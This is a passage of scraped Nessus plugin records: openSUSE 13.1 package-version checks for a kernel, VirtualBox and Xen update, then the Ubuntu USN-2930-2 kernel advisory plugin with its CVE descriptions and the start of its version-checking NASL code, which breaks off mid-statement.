rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-debuginfo-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-debuginfo-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-debuginfo-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debugsource-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-devel-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-debuginfo-4.2.36_k3.12.57_44-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-source-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-debugsource-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-devel-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-debuginfo-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-debuginfo-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-debuginfo-4.3.4_10_k3.12.57_44-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-debuginfo-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-debuginfo-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-2.3-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debuginfo-2.3-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debugsource-2.3-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-debuginfo-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-debuginfo-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-debuginfo-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-debuginfo-2.3_k3.12.57_44-2.27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-4.3.4_10-61.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-debuginfo-4.3.4_10-61.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cloop / cloop-debuginfo / cloop-debugsource / cloop-kmp-default / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:35:45", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Linux kernel (Wily HWE) vulnerabilities (USN-2930-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc-e500mc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc64-emb", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc64-smp", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2930-2.NASL", "href": "https://www.tenable.com/plugins/nessus/89935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89935);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2015-7566\",\n \"CVE-2015-8767\",\n \"CVE-2016-0723\",\n \"CVE-2016-2384\",\n \"CVE-2016-2543\",\n \"CVE-2016-2544\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2016-2547\",\n \"CVE-2016-2548\",\n \"CVE-2016-2549\",\n \"CVE-2016-2782\",\n \"CVE-2016-3134\",\n \"CVE-2016-3135\"\n );\n script_xref(name:\"USN\", value:\"2930-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Linux kernel (Wily HWE) vulnerabilities (USN-2930-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2930-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3135\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-3134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc-e500mc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc64-emb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2.0-34-powerpc64-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar kernel_mappings = {\n '14.04': {\n '4.2.0': {\n 'generic': '4.2.0-34',\n 'generic-lpae': '4.2.0-34',\n 'lowlatency': '4.2.0-34',\n 'powerpc-e500mc': '4.2.0-34',\n 'powerpc-smp': '4.2.0-34',\n 'powerpc64-emb': '4.2.0-34',\n 'powerpc64-smp': '4.2.0-34'\n }\n }\n};\n\nvar host_kernel_release = 